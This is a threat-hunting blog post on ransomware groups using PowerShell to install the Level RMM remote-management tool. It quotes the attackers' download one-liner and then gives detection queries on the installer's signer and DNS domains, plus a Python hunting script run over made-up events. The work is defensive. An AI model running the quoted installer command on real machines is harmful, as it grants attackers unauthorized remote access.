184. Ransomware Gangs Abuse PowerShell to Install Level RMM

Hello everyone!

RMMs. Yes, again. This one isn't new, but I don't see it often enough, so I decided to share some detection and hunting ideas for it. I'm talking about Level RMM.

According to this report, the adversary leveraged PowerShell to download the installer:

powershell $env:LEVEL_API_KEY = <API Key>; Set-ExecutionPolicy RemoteSigned -Scope Process -Force; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $tempFile = Join-Path ([System.IO.Path]::GetTempPath()) "install_windows.exe"; Invoke-WebRequest -Uri "hxxps://downloads[.]level[.]io/install_windows.exe" -OutFile $tempFile;

The executable is signed by Level Software, Inc. Why not use the signer for detection?

event_type: "processcreatewin"

AND

proc_file_sig: "Level Software"

Another detection opportunity is searching for Level RMM-related domains:

event_type: "dnsreqwin"

AND

dns_rname: ("level.io" OR "rmm.dev")
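As an added example that is not part of the original post, here is the logic of both queries above (signer check on process creation, domain check on DNS requests), plus a match on the PowerShell one-liner itself, run over a few constructed events in Python. The event_type, proc_file_sig and dns_rname fields follow the queries in the post; the proc_cmdline and proc_p_cmdline field names and the sample events themselves are assumptions made for the example.

```python
import re
from typing import Dict, Iterable, List, Tuple

Event = Dict[str, str]

# Indicators taken from the post: the code-signing subject and the two domains.
LEVEL_SIGNER = "level software"
LEVEL_DOMAINS = ("level.io", "rmm.dev")

# The installer one-liner sets LEVEL_API_KEY and fetches install_windows.exe
# from downloads.level.io; either fragment in a command line is a hit.
INSTALLER_CMDLINE_RE = re.compile(
    r"LEVEL_API_KEY|downloads\.level\.io/install_windows\.exe", re.IGNORECASE
)

# Constructed sample telemetry (not real logs). The field names proc_cmdline and
# proc_p_cmdline (child and parent command line) are assumed for this example.
SAMPLE_EVENTS: List[Event] = [
    {
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Users\Public\AppData\Local\Temp\install_windows.exe",
        "proc_file_sig": "Level Software, Inc.",
        "proc_cmdline": r"C:\Users\Public\AppData\Local\Temp\install_windows.exe",
        "proc_p_cmdline": 'powershell $env:LEVEL_API_KEY = "REDACTED"; '
                          'Invoke-WebRequest -Uri "https://downloads.level.io/install_windows.exe"',
    },
    {
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\notepad.exe",
        "proc_file_sig": "Microsoft Windows",
        "proc_cmdline": "notepad.exe",
        "proc_p_cmdline": "explorer.exe",
    },
    {"event_type": "dnsreqwin", "dns_rname": "downloads.level.io"},
    {"event_type": "dnsreqwin", "dns_rname": "www.example.com"},
    {"event_type": "dnsreqwin", "dns_rname": "agent.rmm.dev"},
    {"event_type": "dnsreqwin", "dns_rname": "notlevel.io"},  # must NOT match: wrong suffix
]


def is_level_signed_process(ev: Event) -> bool:
    """Mirror of: event_type processcreatewin AND proc_file_sig contains 'Level Software'."""
    return (
        ev.get("event_type") == "processcreatewin"
        and LEVEL_SIGNER in ev.get("proc_file_sig", "").lower()
    )


def is_level_domain(name: str) -> bool:
    """True for level.io / rmm.dev and their subdomains only (suffix match, not substring)."""
    name = name.lower().rstrip(".")  # tolerate a trailing dot from the resolver
    return any(name == d or name.endswith("." + d) for d in LEVEL_DOMAINS)


def is_level_dns_request(ev: Event) -> bool:
    """Mirror of: event_type dnsreqwin AND dns_rname in (level.io, rmm.dev)."""
    return ev.get("event_type") == "dnsreqwin" and is_level_domain(ev.get("dns_rname", ""))


def is_level_installer_cmdline(cmdline: str) -> bool:
    """Match the PowerShell one-liner fragments from the report."""
    return bool(INSTALLER_CMDLINE_RE.search(cmdline))


def hunt(events: Iterable[Event]) -> List[Tuple[Event, List[str]]]:
    """Return every event that trips at least one rule, with the reasons it matched."""
    hits: List[Tuple[Event, List[str]]] = []
    for ev in events:
        reasons: List[str] = []
        if is_level_signed_process(ev):
            reasons.append("signed by Level Software")
        if ev.get("event_type") == "processcreatewin" and is_level_installer_cmdline(
            ev.get("proc_p_cmdline", "") + " " + ev.get("proc_cmdline", "")
        ):
            reasons.append("PowerShell installer one-liner")
        if is_level_dns_request(ev):
            reasons.append("Level RMM domain")
        if reasons:
            hits.append((ev, reasons))
    return hits


if __name__ == "__main__":
    for ev, reasons in hunt(SAMPLE_EVENTS):
        print(ev.get("proc_file_path") or ev.get("dns_rname"), "->", ", ".join(reasons))
```

Two points worth carrying over into a real query: match the domains as a suffix (the example rejects the constructed name notlevel.io, which a bare substring search would accept), and if Level RMM is licensed in your environment, baseline which hosts and parent processes normally run the installer or resolve these domains before alerting on every hit.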

See you tomorrow!
